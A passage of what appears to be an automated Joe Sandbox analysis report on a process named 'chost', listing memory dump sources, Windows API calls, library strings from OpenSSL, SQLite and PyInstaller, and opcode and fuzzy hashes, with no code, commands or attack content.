                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                        • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                        • Instruction ID: a6280de1c0bab613fee23de0b9244be09294a148c034884cb2768bd479b885f6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D51603290828386EB748E37908636877A1FB55B94F249279DA5D87B99CF3CE850CB05
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\tls_srp.c
                                                                                                                                                                                                                                        • API String ID: 3568877910-1778748169
                                                                                                                                                                                                                                        • Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                        • Instruction ID: d818a32843ff47e358ca3fd359a2c83f7b507317608d08e6560e6665b705334f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2413F21B1AA8380FB54AB619570BB83298EF41F98F188634DE7D0BFCDDF3CA4018650
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,?,00007FF69436352C,?,00000000,00007FF694363F23), ref: 00007FF694367F22
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                        • Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                                        • Instruction ID: c785f8d82bda67997179227cf3433a2a6e8fb5056e6c619aa0187108888648f2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7931D421619AC245EA319B32E8917AA7354EF84BE4F448279EE6DC77C9EF2CD605C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                        • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                        • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                        • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                        • Instruction ID: fffc2b012b497ff34626e6a0aed64a935c2a092e32d121183facd13d28b4fabf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C921A372708B4291E7209B26F8857EA73A4EB88780F40813AEA8DD3756DE3CD649C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                        • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                        • Instruction ID: abd8ef16a9b81290618f77638e7ac576d5da9cce812b5851d7f73eb9d09b65d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90D1E272B18A81CAE760CF76D4902AC37B1FB44798B44C279DE9E97B99DE38D006C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69437CFBB), ref: 00007FF69437D0EC
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69437CFBB), ref: 00007FF69437D177
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                                        • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                        • Instruction ID: 2e69c92b5fee76b3c9db045bb972130a1e9932fa3c44fae0c288559885190782
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE919132E2C652C5F7709F7694C02BD2BA0EB44B98F14817DDE8EA7A85DE38D442C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1956198572-0
                                                                                                                                                                                                                                        • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                        • Instruction ID: 63d83a58b65f6a7f80efd341cc31b7d7991bd07e953fad8e29ae40335f5b7c24
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4711E921A0C14782F66497BBE5C62796251EB88780F95C078EF5987B9ACD2DD491C600
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378252189.00007FFDEAE41000.00000040.00000001.01000000.00000022.sdmp, Offset: 00007FFDEAE40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378210021.00007FFDEAE40000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEA2000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEEE000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEF2000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEF7000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAF4F000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAF54000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAF57000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378628612.00007FFDEAF58000.00000080.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378672916.00007FFDEAF59000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdeae40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                        • Opcode ID: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                                        • Instruction ID: e0adb3e85cabbb1082b5491e64f3889f6083901f9efc2b0f53a6668c389fd8f9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A112126B15F0389EB04DF60E8643B933A4F719B58F441E31EA5D46764EF78D5548381
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                        • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                        • Instruction ID: 503c07c0820b53d4637b48a728f68b3aaecd8a7943a55627700934a713639fd3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80111F26B14B06CAEB10CB72E8952B933A4F719758F440E35EA6D867A4EF78D154C340
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                        • Opcode ID: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                        • Instruction ID: ef7c9747639f95529ba8e3ed77ae06a0c362cbff4247b0c6534510c211dc5778
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B113332B15F4189EB00CF70E8646B833B8F759758F440E31DA6D86B98EF78D5588340
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
                                                                                                                                                                                                                                        • API String ID: 3568877910-384499812
                                                                                                                                                                                                                                        • Opcode ID: 55e1937c5e44d1fa6eb7639b4386b7cde31f3b10beb005c0ec3602d9af263100
                                                                                                                                                                                                                                        • Instruction ID: e0fc461cddf30f9ff2c91171711ba0712cf528a8f335ade5d138ee429ac731e1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55e1937c5e44d1fa6eb7639b4386b7cde31f3b10beb005c0ec3602d9af263100
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7D15E32B08B8282EB55DF25D5A0AB833A8FB45B44F484035DE6D47BD9EF38E960C310
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
                                                                                                                                                                                                                                        • API String ID: 3568877910-1331951588
                                                                                                                                                                                                                                        • Opcode ID: 255756c35d00e9a0da72a34b4993913d5a5468d22542b83d5da4e1e20c485908
                                                                                                                                                                                                                                        • Instruction ID: a8a2bdc4c7666ae0ba4389d6ba07a9b58777b269ab6009c72710387bd7765516
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 255756c35d00e9a0da72a34b4993913d5a5468d22542b83d5da4e1e20c485908
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ADC19F36B0868682E7559B26D560BB97369FB84B88F044131DF6D47BEACF3EE451C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: string or blob too big
                                                                                                                                                                                                                                        • API String ID: 2636501453-2803948771
                                                                                                                                                                                                                                        • Opcode ID: defa5a02923370369b9de52485ae0b8c7a42c531ab77cdfb156cd6adcff6b966
                                                                                                                                                                                                                                        • Instruction ID: b4c9c60c6e0d584c711ca9e17ae823441c9f2bcddcb9bcaae0cd4650972b2cdf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: defa5a02923370369b9de52485ae0b8c7a42c531ab77cdfb156cd6adcff6b966
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E991682AF0920285FB68DB159965BF926B0EF40B84F084235DE6D823D9DF2DE449E748
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • 00007FFE0E142010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFDF70EDA8A,?,?,?,00007FFDF70EDE4B), ref: 00007FFDF70ED9F7
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: CRE$INS
                                                                                                                                                                                                                                        • API String ID: 2636501453-4116259516
                                                                                                                                                                                                                                        • Opcode ID: dc797912a9dd998a2f9e1b3e17851358f1a3a2f9703f0521fb270c7deed9757b
                                                                                                                                                                                                                                        • Instruction ID: 7ffb0977f786cf37c8b032a6a3333f69d3dcd13b02600ccd3ac3445fec487622
